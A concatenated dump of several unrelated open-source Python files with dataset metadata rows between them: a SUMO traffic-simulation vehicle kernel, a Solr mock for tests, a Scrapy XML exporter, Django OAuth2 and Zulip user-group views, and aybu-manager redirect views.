def get_num_arrived(self):
"""See parent class."""
if len(self._num_arrived) > 0:
return self._num_arrived[-1]
else:
return 0
def get_arrived_ids(self):
"""See parent class."""
if len(self._arrived_ids) > 0:
return self._arrived_ids[-1]
else:
return 0
def get_departed_ids(self):
"""See parent class."""
if len(self._departed_ids) > 0:
return self._departed_ids[-1]
else:
return 0
def get_speed(self, veh_id, error=-1001):
"""See parent class."""
if isinstance(veh_id, (list, np.ndarray)):
return [self.get_speed(vehID, error) for vehID in veh_id]
return self.__sumo_obs.get(veh_id, {}).get(tc.VAR_SPEED, error)
def get_default_speed(self, veh_id, error=-1001):
"""See parent class."""
if isinstance(veh_id, (list, np.ndarray)):
return [self.get_default_speed(vehID, error) for vehID in veh_id]
return self.__sumo_obs.get(veh_id, {}).get(tc.VAR_SPEED_WITHOUT_TRACI,
error)
def get_position(self, veh_id, error=-1001):
"""See parent class."""
if isinstance(veh_id, (list, np.ndarray)):
return [self.get_position(vehID, error) for vehID in veh_id]
return self.__sumo_obs.get(veh_id, {}).get(tc.VAR_LANEPOSITION, error)
def get_edge(self, veh_id, error=""):
"""See parent class."""
if isinstance(veh_id, (list, np.ndarray)):
return [self.get_edge(vehID, error) for vehID in veh_id]
return self.__sumo_obs.get(veh_id, {}).get(tc.VAR_ROAD_ID, error)
def get_lane(self, veh_id, error=-1001):
"""See parent class."""
if isinstance(veh_id, (list, np.ndarray)):
return [self.get_lane(vehID, error) for vehID in veh_id]
return self.__sumo_obs.get(veh_id, {}).get(tc.VAR_LANE_INDEX, error)
def get_route(self, veh_id, error=list()):
"""See parent class."""
if isinstance(veh_id, (list, np.ndarray)):
return [self.get_route(vehID, error) for vehID in veh_id]
return self.__sumo_obs.get(veh_id, {}).get(tc.VAR_EDGES, error)
def get_length(self, veh_id, error=-1001):
"""See parent class."""
if isinstance(veh_id, (list, np.ndarray)):
return [self.get_length(vehID, error) for vehID in veh_id]
return self.__vehicles.get(veh_id, {}).get("length", error)
def get_leader(self, veh_id, error=""):
"""See parent class."""
if isinstance(veh_id, (list, np.ndarray)):
return [self.get_leader(vehID, error) for vehID in veh_id]
return self.__vehicles.get(veh_id, {}).get("leader", error)
def get_follower(self, veh_id, error=""):
"""See parent class."""
if isinstance(veh_id, (list, np.ndarray)):
return [self.get_follower(vehID, error) for vehID in veh_id]
return self.__vehicles.get(veh_id, {}).get("follower", error)
def get_headway(self, veh_id, error=-1001):
"""See parent class."""
if isinstance(veh_id, (list, np.ndarray)):
return [self.get_headway(vehID, error) for vehID in veh_id]
return self.__vehicles.get(veh_id, {}).get("headway", error)
def get_last_lc(self, veh_id, error=-1001):
"""See parent class."""
if isinstance(veh_id, (list, np.ndarray)):
            return [self.get_last_lc(vehID, error) for vehID in veh_id]
if veh_id not in self.__rl_ids:
warnings.warn('Vehicle {} is not RL vehicle, "last_lc" term set to'
' {}.'.format(veh_id, error))
return error
else:
            return self.__vehicles.get(veh_id, {}).get("last_lc", error)
def get_acc_controller(self, veh_id, error=None):
"""See parent class."""
if isinstance(veh_id, (list, np.ndarray)):
return [self.get_acc_controller(vehID, error) for vehID in veh_id]
return self.__vehicles.get(veh_id, {}).get("acc_controller", error)
def get_lane_changing_controller(self, veh_id, error=None):
"""See parent class."""
if isinstance(veh_id, (list, np.ndarray)):
return [
self.get_lane_changing_controller(vehID, error)
for vehID in veh_id
]
return self.__vehicles.get(veh_id, {}).get("lane_changer", error)
def get_routing_controller(self, veh_id, error=None):
"""See parent class."""
if isinstance(veh_id, (list, np.ndarray)):
return [
self.get_routing_controller(vehID, error) for vehID in veh_id
]
return self.__vehicles.get(veh_id, {}).get("router", error)
def set_lane_headways(self, veh_id, lane_headways):
"""Set the lane headways of the specified vehicle."""
self.__vehicles[veh_id]["lane_headways"] = lane_headways
def get_lane_headways(self, veh_id, error=list()):
"""See parent class."""
if isinstance(veh_id, (list, np.ndarray)):
return [self.get_lane_headways(vehID, error) for vehID in veh_id]
return self.__vehicles.get(veh_id, {}).get("lane_headways", error)
def get_lane_leaders_speed(self, veh_id, error=list()):
"""See parent class."""
lane_leaders = self.get_lane_leaders(veh_id)
return [0 if lane_leader == '' else self.get_speed(lane_leader)
for lane_leader in lane_leaders]
def get_lane_followers_speed(self, veh_id, error=list()):
"""See parent class."""
lane_followers = self.get_lane_followers(veh_id)
return [0 if lane_follower == '' else self.get_speed(lane_follower)
for lane_follower in lane_followers]
def set_lane_leaders(self, veh_id, lane_leaders):
"""Set the lane leaders of the specified vehicle."""
self.__vehicles[veh_id]["lane_leaders"] = lane_leaders
def get_lane_leaders(self, veh_id, error=list()):
"""See parent class."""
if isinstance(veh_id, (list, np.ndarray)):
return [self.get_lane_leaders(vehID, error) for vehID in veh_id]
return self.__vehicles[veh_id]["lane_leaders"]
def set_lane_tailways(self, veh_id, lane_tailways):
"""Set the lane tailways of the specified vehicle."""
self.__vehicles[veh_id]["lane_tailways"] = lane_tailways
def get_lane_tailways(self, veh_id, error=list()):
"""See parent class."""
if isinstance(veh_id, (list, np.ndarray)):
return [self.get_lane_tailways(vehID, error) for vehID in veh_id]
return self.__vehicles.get(veh_id, {}).get("lane_tailways", error)
def set_lane_followers(self, veh_id, lane_followers):
"""Set the lane followers of the specified vehicle."""
self.__vehicles[veh_id]["lane_followers"] = lane_followers
def get_lane_followers(self, veh_id, error=list()):
"""See parent class."""
if isinstance(veh_id, (list, np.ndarray)):
return [self.get_lane_followers(vehID, error) for vehID in veh_id]
return self.__vehicles.get(veh_id, {}).get("lane_followers", error)
def _multi_lane_headways(self):
"""Compute multi-lane data for all vehicles.
This includes the lane leaders/followers/headways/tailways/
leader velocity/follower velocity for all
vehicles in the network.
"""
edge_list = self.master_kernel.scenario.get_edge_list()
junction_list = self.master_kernel.scenario.get_junction_list()
tot_list = edge_list + junction_list
num_edges = (len(self.master_kernel.scenario.get_edge_list()) + len(
self.master_kernel.scenario.get_junction_list()))
# maximum number of lanes in the network
max_lanes = max([self.master_kernel.scenario.num_lanes(edge_id)
for edge_id in tot_list])
# Key = edge id
# Element = list, with the ith element containing tuples with the name
# and position of all vehicles in lane i
edge_dict = dict.fromkeys(tot_list)
# add the vehicles to the edge_dict element
for veh_id in self.get_ids():
edge = self.get_edge(veh_id)
lane = self.get_lane(veh_id)
pos = self.get_position(veh_id)
if edge:
if edge_dict[edge] is None:
edge_dict[edge] = [[] for _ in range(max_lanes)]
edge_dict[edge][lane].append((veh_id, pos))
# sort all lanes in each edge by position
for edge in tot_list:
if edge_dict[edge] is None:
del edge_dict[edge]
else:
for lane in range(max_lanes):
edge_dict[edge][lane].sort(key=lambda x: x[1])
for veh_id in self.get_rl_ids():
# collect the lane leaders, followers, headways, and tailways for
# each vehicle
edge = self.get_edge(veh_id)
if edge:
headways, tailways, leaders, followers = \
self._multi_lane_headways_util(veh_id, edge_dict,
num_edges)
# add the above values to the vehicles class
self.set_lane_headways(veh_id, headways)
self.set_lane_tailways(veh_id, tailways)
self.set_lane_leaders(veh_id, leaders)
self.set_lane_followers(veh_id, followers)
self._ids_by_edge = dict().fromkeys(edge_list)
for edge_id in edge_dict:
edges = list(itertools.chain.from_iterable(edge_dict[edge_id]))
# check for edges with no vehicles
if len(edges) > 0:
edges, _ = zip(*edges)
self._ids_by_edge[edge_id] = list(edges)
else:
self._ids_by_edge[edge_id] = []
def _multi_lane_headways_util(self, veh_id, edge_dict, num_edges):
"""Compute multi-lane data for the specified vehicle.
Parameters
----------
veh_id : str
name of the vehicle
edge_dict : dict < list<tuple> >
Key = Edge name
Index = lane index
Element = list sorted by position of (vehicle id, position)
Returns
-------
headway : list<float>
Index = lane index
Element = headway at this lane
tailway : list<float>
Index = lane index
Element = tailway at this lane
lead_speed : list<str>
Index = lane index
Element = speed of leader at this lane
follow_speed : list<str>
Index = lane index
Element = speed of follower at this lane
leader : list<str>
Index = lane index
Element = leader at this lane
follower : list<str>
Index = lane index
Element = follower at this lane
"""
this_pos = self.get_position(veh_id)
this_edge = self.get_edge(veh_id)
this_lane = self.get_lane(veh_id)
num_lanes = self.master_kernel.scenario.num_lanes(this_edge)
# set default values for all output values
headway = [1000] * num_lanes
tailway = [1000] * num_lanes
leader = [""] * num_lanes
follower = [""] * num_lanes
for lane in range(num_lanes):
# check the vehicle's current edge for lane leaders and followers
if len(edge_dict[this_edge][lane]) > 0:
ids, positions = zip(*edge_dict[this_edge][lane])
ids = list(ids)
positions = list(positions)
index = bisect_left(positions, this_pos)
# if you are at the end or the front of the edge, the lane
# leader is in the edges in front of you
if (lane == this_lane and index < len(positions) - 1) \
or (lane != this_lane and index < len(positions)):
# check if the index does not correspond to the current
# vehicle
if ids[index] == veh_id:
leader[lane] = ids[index + 1]
headway[lane] = (positions[index + 1] - this_pos -
self.get_length(leader[lane]))
else:
leader[lane] = ids[index]
headway[lane] = (positions[index] - this_pos
- self.get_length(leader[lane]))
# you are in the back of the queue, the lane follower is in the
# edges behind you
if index > 0:
follower[lane] = ids[index - 1]
tailway[lane] = (this_pos - positions[index - 1]
- self.get_length(veh_id))
# if lane leader not found, check next edges
if leader[lane] == "":
headway[lane], leader[lane] = self._next_edge_leaders(
veh_id, edge_dict, lane, num_edges)
# if lane follower not found, check previous edges
if follower[lane] == "":
tailway[lane], follower[lane] = self._prev_edge_followers(
veh_id, edge_dict, lane, num_edges)
return headway, tailway, leader, follower
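
    # Shape of the `edge_dict` argument consumed above (values illustrative):
    #
    #     {'edge0': [[('veh_0', 5.0), ('veh_1', 40.2)],  # lane 0, sorted by pos
    #                [('veh_2', 12.5)]]}                  # lane 1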
def _next_edge_leaders(self, veh_id, edge_dict, lane, num_edges):
"""Search for leaders in the next edge.
Looks to the edges/junctions in front of the vehicle's current edge
for potential leaders. This is currently done by only looking one
edge/junction forwards.
Returns
-------
headway : float
lane headway for the specified lane
leader : str
lane leader for the specified lane
"""
pos = self.get_position(veh_id)
edge = self.get_edge(veh_id)
headway = 1000 # env.scenario.length
leader = ""
add_length = 0 # length increment in headway
for _ in range(num_edges):
# break if there are no edge/lane pairs behind the current one
if len(self.master_kernel.scenario.next_edge(edge, lane)) == 0:
break
add_length += self.master_kernel.scenario.edge_length(edge)
edge, lane = self.master_kernel.scenario.next_edge(edge, lane)[0]
try:
if len(edge_dict[edge][lane]) > 0:
leader = edge_dict[edge][lane][0][0]
headway = edge_dict[edge][lane][0][1] - pos + add_length \
- self.get_length(leader)
except KeyError:
# current edge has no vehicles, so move on
# print(traceback.format_exc())
continue
# stop if a lane follower is found
if leader != "":
break
return headway, leader
def _prev_edge_followers(self, veh_id, edge_dict, lane, num_edges):
"""Search for followers in the previous edge.
Looks to the edges/junctions behind the vehicle's current edge for
potential followers. This is currently done by only looking one
edge/junction backwards.
Returns
-------
tailway : float
lane tailway for the specified lane
follower : str
lane follower for the specified lane
"""
pos = self.get_position(veh_id)
edge = self.get_edge(veh_id)
tailway = 1000 # env.scenario.length
follower = ""
add_length = 0 # length increment in headway
for _ in range(num_edges):
# break if there are no edge/lane pairs behind the current one
if len(self.master_kernel.scenario.prev_edge(edge, lane)) == 0:
break
edge, lane = self.master_kernel.scenario.prev_edge(edge, lane)[0]
add_length += self.master_kernel.scenario.edge_length(edge)
try:
if len(edge_dict[edge][lane]) > 0:
tailway = pos - edge_dict[edge][lane][-1][1] + add_length \
- self.get_length(veh_id)
follower = edge_dict[edge][lane][-1][0]
except KeyError:
# current edge has no vehicles, so move on
# print(traceback.format_exc())
continue
# stop if a lane follower is found
if follower != "":
break
return tailway, follower
def apply_acceleration(self, veh_ids, acc):
"""See parent class."""
# to hand the case of a single vehicle
if type(veh_ids) == str:
veh_ids = [veh_ids]
acc = [acc]
for i, vid in enumerate(veh_ids):
if acc[i] is not None and vid in self.get_ids():
this_vel = self.get_speed(vid)
next_vel = max([this_vel + acc[i] * self.sim_step, 0])
self.kernel_api.vehicle.slowDown(vid, next_vel, 1e-3)
def apply_lane_change(self, veh_ids, direction):
"""See parent class."""
# to hand the case of a single vehicle
if type(veh_ids) == str:
veh_ids = [veh_ids]
direction = [direction]
# if any of the directions are not -1, 0, or 1, raise a ValueError
if any(d not in [-1, 0, 1] for d in direction):
raise ValueError(
"Direction values for lane changes may only be: -1, 0, or 1.")
for i, veh_id in enumerate(veh_ids):
# check for no lane change
if direction[i] == 0:
continue
            # compute the target lane, and clip it so vehicles don't try to
            # lane change out of range
this_lane = self.get_lane(veh_id)
this_edge = self.get_edge(veh_id)
target_lane = min(
max(this_lane + direction[i], 0),
self.master_kernel.scenario.num_lanes(this_edge) - 1)
            # perform the requested lane change action in TraCI
if target_lane != this_lane:
self.kernel_api.vehicle.changeLane(
veh_id, int(target_lane), 100000)
if veh_id in self.get_rl_ids():
self.prev_last_lc[veh_id] = \
self.__vehicles[veh_id]["last_lc"]
def choose_routes(self, veh_ids, route_choices):
"""See parent class."""
# to hand the case of a single vehicle
if type(veh_ids) == str:
veh_ids = [veh_ids]
route_choices = [route_choices]
for i, veh_id in enumerate(veh_ids):
if route_choices[i] is not None:
self.kernel_api.vehicle.setRoute(
vehID=veh_id, edgeList=route_choices[i])
def get_x_by_id(self, veh_id):
"""See parent class."""
if self.get_edge(veh_id) == '':
            # occurs when a vehicle has crashed or is teleported for some
            # other reason
return 0.
return self.master_kernel.scenario.get_x(
self.get_edge(veh_id), self.get_position(veh_id))
def update_vehicle_colors(self):
"""See parent class.
The colors of all vehicles are updated as follows:
- red: autonomous (rl) vehicles
- white: unobserved human-driven vehicles
- cyan: observed human-driven vehicles
"""
for veh_id in self.get_rl_ids():
try:
# color rl vehicles red
self.set_color(veh_id=veh_id, color=RED)
except (FatalTraCIError, TraCIException) as e:
print('Error when updating rl vehicle colors:', e)
print(traceback.format_exc())
# color vehicles white if not observed and cyan if observed
for veh_id in self.get_human_ids():
try:
color = CYAN if veh_id in self.get_observed_ids() else WHITE
self.set_color(veh_id=veh_id, color=color)
except (FatalTraCIError, TraCIException) as e:
print('Error when updating human vehicle colors:', e)
print(traceback.format_exc())
# clear the list of observed vehicles
for veh_id in self.get_observed_ids():
self.remove_observed(veh_id)
def get_color(self, veh_id):
"""See parent class.
This does not pass the last term (i.e. transparency).
"""
r, g, b, t = self.kernel_api.vehicle.getColor(veh_id)
return r, g, b
def set_color(self, veh_id, color):
"""See parent class.
The last term for sumo (transparency) is set to 255.
"""
if self._color_vehicles:
r, g, b = color
self.kernel_api.vehicle.setColor(
vehID=veh_id, color=(r, g, b, 255))
def add(self, veh_id, type_id, edge, pos, lane, speed):
"""See parent class."""
if veh_id in self.master_kernel.scenario.rts:
# If the vehicle has its own route, use that route. This is used in
# the case of network templates.
route_id = 'route{}_0'.format(veh_id)
else:
num_routes = len(self.master_kernel.scenario.rts[edge])
frac = [val[1] for val in self.master_kernel.scenario.rts[edge]]
route_id = 'route{}_{}'.format(edge, np.random.choice(
[i for i in range(num_routes)], size=1, p=frac)[0])
self.kernel_api.vehicle.addFull(
veh_id,
route_id,
typeID=str(type_id),
departLane=str(lane),
departPos=str(pos),
departSpeed=str(speed))
def get_max_speed(self, veh_id, error=-1001):
"""See parent class."""
if isinstance(veh_id, (list, np.ndarray)):
return [self.get_max_speed(vehID, error) for vehID in veh_id]
return self.kernel_api.vehicle.getMaxSpeed(veh_id)
def set_max_speed(self, veh_id, max_speed):
"""See parent class."""
self.kernel_api.vehicle.setMaxSpeed(veh_id, max_speed)
| mit | -1,442,293,774,495,089,400 | 38.736533 | 79 | 0.559316 | false | 3.683919 | false | false | false |
jonnybazookatone/solr-service | solr/tests/mocks.py | 1 | 2172 | """
Mock responses
"""
from httpretty import HTTPretty
from .stubdata.solr import example_solr_response
import json
class HTTPrettyMock(object):
"""
httpretty context manager scaffolding
"""
def __enter__(self):
HTTPretty.enable()
def __exit__(self, etype, value, traceback):
"""
:param etype: exit type
:param value: exit value
:param traceback: the traceback for the exit
"""
HTTPretty.reset()
HTTPretty.disable()
class MockSolrResponse(HTTPrettyMock):
"""
context manager that mocks a Solr response
"""
def __init__(self, api_endpoint):
"""
:param api_endpoint: name of the API end point
"""
self.api_endpoint = api_endpoint
def request_callback(request, uri, headers):
"""
:param request: HTTP request
:param uri: URI/URL to send the request
:param headers: header of the HTTP request
:return: httpretty response
"""
resp = json.loads(example_solr_response)
resp['responseHeader'] = {'params': request.parsed_body}
# Mimic the start, rows behaviour
rows = int(
request.parsed_body.get(
'rows', [len(resp['response']['docs'])]
)[0]
)
start = int(request.querystring.get('start', [0])[0])
try:
resp['response']['docs'] = resp['response']['docs'][start:start+rows]
except IndexError:
resp['response']['docs'] = resp['response']['docs'][start:]
# Mimic the filter "fl" behaviour
fl = request.parsed_body['fl'][0].split(',')
resp['response']['docs'] = [
{field: doc.get(field) for field in fl}
for doc in resp['response']['docs']
]
return 200, headers, json.dumps(resp)
HTTPretty.register_uri(
HTTPretty.POST,
self.api_endpoint,
body=request_callback,
content_type="application/json"
) | mit | -4,958,901,464,828,584,000 | 26.858974 | 85 | 0.524401 | false | 4.534447 | false | false | false |
niklasben/BAThesis | Crawler/Scrapy_One/pipelines.py | 1 | 1407 | # -*- coding: utf-8 -*-
"""
Created on Fri Jul 24 15:50:53 2015
@author: Niklas Bendixen
"""
# Define your item pipelines here
#
# Don't forget to add your pipeline to the ITEM_PIPELINES setting
# See: http://doc.scrapy.org/topics/item-pipeline.html
from scrapy import signals # http://doc.scrapy.org/en/1.0/topics/signals.html
from scrapy.exporters import XmlItemExporter # http://doc.scrapy.org/en/1.0/topics/exporters.html#xmlitemexporter
class XmlExportPipeline(object):
def __init__(self):
self.files = {}
@classmethod
def from_crawler(cls, crawler):
pipeline = cls()
crawler.signals.connect(pipeline.spider_opened, signals.spider_opened)
crawler.signals.connect(pipeline.spider_closed, signals.spider_closed)
return pipeline
def spider_opened(self, spider):
        # allowed_domains is a list; use its first entry as the file name
        xml_name = spider.allowed_domains[0]
file = open('../../output/%s_crawled.xml' % xml_name, 'w+b')
self.files[spider] = file
self.exporter = XmlItemExporter(file, root_element = 'root', item_element = 'item')
self.exporter.start_exporting()
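    # Note: Scrapy only runs this pipeline if it is enabled in settings.py;
    # assuming this module is importable as Scrapy_One.pipelines (as the
    # project layout suggests), that would look like:
    #   ITEM_PIPELINES = {'Scrapy_One.pipelines.XmlExportPipeline': 300}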
def spider_closed(self, spider):
self.exporter.finish_exporting()
file = self.files.pop(spider)
file.close()
def process_item(self, item, spider):
self.exporter.export_item(item)
return item | mit | -7,774,707,310,006,759,000 | 31.744186 | 116 | 0.651741 | false | 3.544081 | false | false | false |
leifj/django-oauth2-lite | django_oauth2_lite/views.py | 1 | 7049 | """Views for django_oauth2_lite application."""
from django.shortcuts import render_to_response, get_object_or_404
from django_oauth2_lite.models import Client, scope_by_name, code_by_token, token_by_value,\
Scope, Token
from django_oauth2_lite.forms import CodeForm, ClientForm
from django.http import HttpResponseBadRequest, HttpResponse,\
HttpResponseRedirect
from django.utils import simplejson
from django_oauth2_lite.decorators import clientauth_required
from django.views.generic.list_detail import object_list
from django.contrib.auth.decorators import login_required
def _get(request,key,dflt=None):
    if key in request.GET:
        return request.GET[key]
    else:
        return dflt
def _post(request,key,dflt=None):
    if key in request.POST:
        return request.POST[key]
    else:
        return dflt
def response_dict(request,d):
if request.user.is_authenticated():
d['user'] = request.user
if request.user and hasattr(request.user,'get_profile'):
d['profile'] = request.user.get_profile()
return d
@login_required
def do_authorize(request,state,template_name):
client = get_object_or_404(Client,client_id=_get(request,'client_id'))
if _get(request,'response_type','code') != 'code':
return client.redirect({'error': 'unsupported_response_type','state': state})
code = client.new_authz_code(owner=request.user,state=state)
for n in _get(request,'scope',"").split(' '):
scope = scope_by_name(n)
if scope == None:
return client.redirect({'error': 'invalid_scope','state': state})
code.token.scopes.add(scope)
form = CodeForm(instance=code)
form.fields['code'].initial = code.token.value
return render_to_response(template_name,response_dict(request,{"form": form, 'client': code.token.client, 'scopes': code.token.scopes}))
def authorize(request,template_name='django_oauth2_lite/authorize.html'):
state = None
if request.REQUEST.has_key('state'):
state = request.REQUEST['state']
    if request.method == 'POST':
        form = CodeForm(request.POST)
        if form.is_valid():
            code = code_by_token(form.cleaned_data['code'])
            if code is None:
                # without a valid code there is no client to redirect to
                return HttpResponseBadRequest()
            client = code.token.client
            if form.cleaned_data['authorized']:
                code.authorized = True
                code.save()
                return client.redirect({'state': state,'code': code.token.value})
            else:
                # keep a reference to the client before deleting the token
                code.token.delete()
                code.delete()
                return client.redirect({'error': 'access_denied','state': state})
        else:
            # an invalid form means no code (and thus no client) was resolved
            return HttpResponseBadRequest()
else:
return do_authorize(request,state,template_name)
def json_response(data):
r = HttpResponse(simplejson.dumps(data),content_type='application/json')
r['Cache-Control'] = 'no-store'
r['Pragma'] = 'no-cache'
return r
def token_error(error):
return json_response({'error': error})
@clientauth_required
def token(request):
if not request.method == 'POST':
return HttpResponseBadRequest()
grant_type = _post(request,'grant_type')
at = None
if grant_type == 'authorization_code':
code = code_by_token(_post(request,'code'))
if not code:
return token_error('invalid_grant')
if not code.is_valid():
if code.token:
if code.token.refresh_token:
code.token.refresh_token.delete()
code.token.delete()
code.delete()
return token_error('invalid_grant')
at = code.new_access_token()
elif grant_type == 'refresh_token':
rt = token_by_value(_post(request,'refresh_token'))
if not rt:
return token_error('invalid_grant')
if not rt.is_valid():
rt.delete()
return token_error('invalid_grant')
## TODO: scope is silently ignored right now - should honor request to narrow scope
at = rt.client.new_access_token(rt.owner, refresh_token=rt)
else:
return token_error('unsupported_grant_type')
return json_response({'access_token': at.value,
'token_type': at.type(),
'expires_in': 3600,
'refresh_token': at.refresh_token.value})
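# Illustrative exchange (values are examples, not fixtures): a client that
# holds an authorization code POSTs, with its client credentials,
#   grant_type=authorization_code&code=<code-value>
# and receives a JSON body shaped like
#   {"access_token": "...", "token_type": "...",
#    "expires_in": 3600, "refresh_token": "..."}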
@login_required
def clients(request,template_name='django_oauth2_lite/clients.html'):
queryset = Client.objects.filter(owner=request.user)
return object_list(request,
template_object_name='client',
queryset=queryset,
template_name=template_name)
@login_required
def tokens(request,template_name='django_oauth2_lite/tokens.html'):
queryset = Token.objects.filter(owner=request.user,refresh_token=None)
return object_list(request,
template_object_name='token',
queryset=queryset,
template_name=template_name)
@login_required
def add_client(request,template_name="django_oauth2_lite/client_form.html"):
if request.method == 'POST':
client = Client(owner=request.user)
form = ClientForm(request.POST,request.FILES,instance=client)
if form.is_valid():
form.save()
return HttpResponseRedirect("../clients")
else:
form = ClientForm()
return render_to_response(template_name,response_dict(request,{'form': form}))
@login_required
def remove_client(request,id):
client = get_object_or_404(Client,id=id)
if client:
client.delete()
return HttpResponseRedirect("../../clients")
@login_required
def remove_token(request,id):
token = get_object_or_404(Token,id=id)
if token:
token.delete()
return HttpResponseRedirect("../../tokens")
# Manage scopes in the admin view
def callback(request,template_name="django_oauth2_lite/callback.html"):
return render_to_response(template_name,response_dict(request,{'error': _get(request,'error'),
'state': _get(request,'state'),
'code': _get(request,'code')}))
@login_required
def test_client(request,id,template_name='django_oauth2_lite/test.html'):
client = get_object_or_404(Client,id=id)
return render_to_response(template_name,response_dict(request,{'client': client,'scopes': Scope.objects.all()}))
@login_required
def scopes(request,template_name='django_oauth2_lite/scopes.html'):
queryset = Scope.objects.all()
return object_list(request,
template_object_name='scope',
queryset=queryset,
template_name=template_name) | bsd-3-clause | 2,089,378,351,555,912,700 | 36.700535 | 140 | 0.612285 | false | 3.996032 | false | false | false |
asidev/aybu-manager | aybu/manager/rest/views/redirects.py | 1 | 3836 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Copyright 2010-2012 Asidev s.r.l.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from aybu.manager.models.validators import (validate_hostname,
check_domain_not_used)
from aybu.manager.exc import ParamsError
from aybu.manager.models import (Instance,
Redirect)
from pyramid.view import view_config
from sqlalchemy.orm.exc import NoResultFound
@view_config(route_name='redirects', request_method=('HEAD', 'GET'))
def list(context, request):
return {r.source: r.to_dict() for r in Redirect.all(request.db_session)}
@view_config(route_name='redirects', request_method='POST',
renderer='taskresponse')
def create(context, request):
try:
source = validate_hostname(request.params['source'])
instance = Instance.get_by_domain(request.db_session,
request.params['destination'])
http_code = request.params.get('http_code', 301)
target_path = request.params.get('target_path', '')
check_domain_not_used(request, source)
except KeyError as e:
raise ParamsError(e)
except NoResultFound:
raise ParamsError('No instance for domain {}'\
.format(request.params['destination']))
else:
params = dict(source=source, instance_id=instance.id,
http_code=http_code, target_path=target_path)
return request.submit_task('redirect.create', **params)
@view_config(route_name='redirect', request_method=('HEAD', 'GET'))
def info(context, request):
return Redirect.get(request.db_session,
request.matchdict['source']).to_dict()
@view_config(route_name='redirect', request_method='DELETE',
renderer='taskresponse')
def delete(context, request):
source = request.matchdict['source']
Redirect.get(request.db_session, source)
return request.submit_task('redirect.delete', source=source)
@view_config(route_name='redirect', request_method='PUT',
renderer='taskresponse')
def update(context, request):
params = dict()
source = request.matchdict['source']
Redirect.get(request.db_session, source)
specs = (
('new_source', check_domain_not_used, [request]),
('destination', Instance.get_by_domain, [request.db_session]),
('http_code', None, None),
('target_path', None, None)
)
try:
for attr, validate_fun, fun_args in specs:
if attr in request.params:
if validate_fun:
fun_args.append(request.params[attr])
params[attr] = validate_fun(*fun_args)
else:
params[attr] = request.params[attr]
except NoResultFound:
raise ParamsError("No instance for domain {}"\
.format(request.params['destination']))
if not params:
raise ParamsError("Missing update fields")
params['source'] = source
if "destination" in params:
params['instance_id'] = params['destination'].id
del params['destination']
if "new_source" in params:
params['new_source'] = validate_hostname(params['new_source'])
return request.submit_task('redirect.update', **params)
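# Illustrative request (path and values are hypothetical): updating only the
# HTTP code and target path of an existing redirect could look like
#   PUT /redirects/www.example.com   http_code=302&target_path=/landing
# Fields omitted from the request are left untouched, and a request with no
# recognized fields is rejected above with "Missing update fields".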
| apache-2.0 | 3,540,996,744,243,458,000 | 34.192661 | 76 | 0.637643 | false | 4.107066 | true | false | false |
mahim97/zulip | zerver/views/user_groups.py | 2 | 4527 | from django.http import HttpResponse, HttpRequest
from django.utils.translation import ugettext as _
from typing import List, Text
from zerver.context_processors import get_realm_from_request
from zerver.lib.actions import check_add_user_group, do_update_user_group_name, \
do_update_user_group_description, bulk_add_members_to_user_group, \
remove_members_from_user_group, check_delete_user_group
from zerver.lib.exceptions import JsonableError
from zerver.lib.request import has_request_variables, REQ
from zerver.lib.response import json_success, json_error
from zerver.lib.users import user_ids_to_users
from zerver.lib.validator import check_list, check_string, check_int, \
check_short_string
from zerver.lib.user_groups import access_user_group_by_id, get_memberships_of_users
from zerver.models import UserProfile, UserGroup, UserGroupMembership
from zerver.views.streams import compose_views, FuncKwargPair
@has_request_variables
def add_user_group(request, user_profile,
name=REQ(),
members=REQ(validator=check_list(check_int), default=[]),
description=REQ()):
# type: (HttpRequest, UserProfile, Text, List[int], Text) -> HttpResponse
user_profiles = user_ids_to_users(members, user_profile.realm)
check_add_user_group(user_profile.realm, name, user_profiles, description)
return json_success()
@has_request_variables
def edit_user_group(request, user_profile,
user_group_id=REQ(validator=check_int),
name=REQ(default=""), description=REQ(default="")):
# type: (HttpRequest, UserProfile, int, Text, Text) -> HttpResponse
if not (name or description):
return json_error(_("No new data supplied"))
user_group = access_user_group_by_id(user_group_id, realm=user_profile.realm)
result = {}
if name != user_group.name:
do_update_user_group_name(user_group, name)
result['name'] = _("Name successfully updated.")
if description != user_group.description:
do_update_user_group_description(user_group, description)
result['description'] = _("Description successfully updated.")
return json_success(result)
@has_request_variables
def delete_user_group(request: HttpRequest, user_profile: UserProfile,
user_group_id: int=REQ(validator=check_int)) -> HttpResponse:
check_delete_user_group(user_group_id, user_profile.realm)
return json_success()
@has_request_variables
def update_user_group_backend(request, user_profile,
user_group_id=REQ(validator=check_int),
delete=REQ(validator=check_list(check_int), default=[]),
add=REQ(validator=check_list(check_int), default=[])):
# type: (HttpRequest, UserProfile, int, List[int], List[int]) -> HttpResponse
if not add and not delete:
return json_error(_('Nothing to do. Specify at least one of "add" or "delete".'))
method_kwarg_pairs = [
(add_members_to_group_backend,
dict(user_group_id=user_group_id, members=add)),
(remove_members_from_group_backend,
dict(user_group_id=user_group_id, members=delete))
] # type: List[FuncKwargPair]
return compose_views(request, user_profile, method_kwarg_pairs)
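# Sketch of the expected payload (ids are examples): one request may both add
# and remove members, e.g. add=[1, 2] and delete=[3]; compose_views then runs
# the two handlers in order and surfaces an error if either of them fails.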
def add_members_to_group_backend(request: HttpRequest, user_profile: UserProfile,
user_group_id: int, members: List[int]) -> HttpResponse:
if not members:
return json_success()
user_group = access_user_group_by_id(user_group_id, user_profile.realm)
user_profiles = user_ids_to_users(members, user_profile.realm)
existing_member_ids = set(get_memberships_of_users(user_group, user_profiles))
    for member in user_profiles:
        if member.id in existing_member_ids:
            raise JsonableError(_("User %s is already a member of this group") % (member.id,))
bulk_add_members_to_user_group(user_group, user_profiles)
return json_success()
def remove_members_from_group_backend(request: HttpRequest, user_profile: UserProfile,
user_group_id: int, members: List[int]) -> HttpResponse:
if not members:
return json_success()
user_profiles = user_ids_to_users(members, user_profile.realm)
user_group = access_user_group_by_id(user_group_id, user_profile.realm)
remove_members_from_user_group(user_group, user_profiles)
return json_success()
| apache-2.0 | -87,036,672,447,215,310 | 45.193878 | 100 | 0.680804 | false | 3.750621 | false | false | false |
dalepartridge/seapy | roms/clim.py | 1 | 2439 | #!/usr/bin/env python
"""
clim.py
ROMS climatology utilities
Written by Brian Powell on 08/15/15
